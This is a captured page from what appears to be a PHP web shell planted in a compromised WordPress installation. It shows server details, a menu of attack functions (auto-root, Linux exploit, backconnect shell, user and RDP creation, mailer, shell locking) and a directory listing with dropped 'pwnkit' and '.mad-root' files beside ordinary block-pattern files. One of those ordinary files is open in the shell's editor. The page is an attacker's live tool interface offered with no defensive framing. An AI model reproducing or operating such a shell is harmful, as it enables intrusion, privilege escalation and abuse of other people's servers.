Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www /
wp-includes /
block-patterns /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
heading-paragraph.php
1.12
KB
-rw-r--r--
large-header-button.php
2.61
KB
-rw-r--r--
large-header.php
1.29
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
quote.php
1.34
KB
-rw-r--r--
text-three-columns-buttons.php
2.55
KB
-rw-r--r--
text-two-columns-with-images.p...
2.32
KB
-rw-r--r--
text-two-columns.php
2.11
KB
-rw-r--r--
three-buttons.php
1.72
KB
-rw-r--r--
two-buttons.php
1.08
KB
-rw-r--r--
two-images.php
992
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : quote.php
<?php /** * Quote block pattern. * * @package WordPress */ return array( 'title' => __( 'Quote' ), 'content' => "<!-- wp:group -->\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container\"><!-- wp:image {\"align\":\"center\",\"width\":164,\"height\":164,\"sizeSlug\":\"large\",\"className\":\"is-style-rounded\"} -->\n<div class=\"wp-block-image is-style-rounded\"><figure class=\"aligncenter size-large is-resized\"><img src=\"https://s.w.org/images/core/5.5/don-quixote-03.jpg\" alt=\"" . __( 'Pencil drawing of Don Quixote' ) . "\" width=\"164\" height=\"164\"/></figure></div>\n<!-- /wp:image -->\n\n<!-- wp:quote {\"align\":\"center\",\"className\":\"is-style-large\"} -->\n<blockquote class=\"wp-block-quote has-text-align-center is-style-large\"><p>" . __( '"Do you see over yonder, friend Sancho, thirty or forty hulking giants? I intend to do battle with them and slay them."' ) . '</p><cite>' . __( '— Don Quixote' ) . "</cite></blockquote>\n<!-- /wp:quote -->\n\n<!-- wp:separator {\"className\":\"is-style-dots\"} -->\n<hr class=\"wp-block-separator is-style-dots\"/>\n<!-- /wp:separator --></div></div>\n<!-- /wp:group -->", 'viewportWidth' => 800, 'categories' => array( 'text' ), 'description' => _x( 'A quote and citation with an image above, and a separator at the bottom.', 'Block pattern description' ), );
Close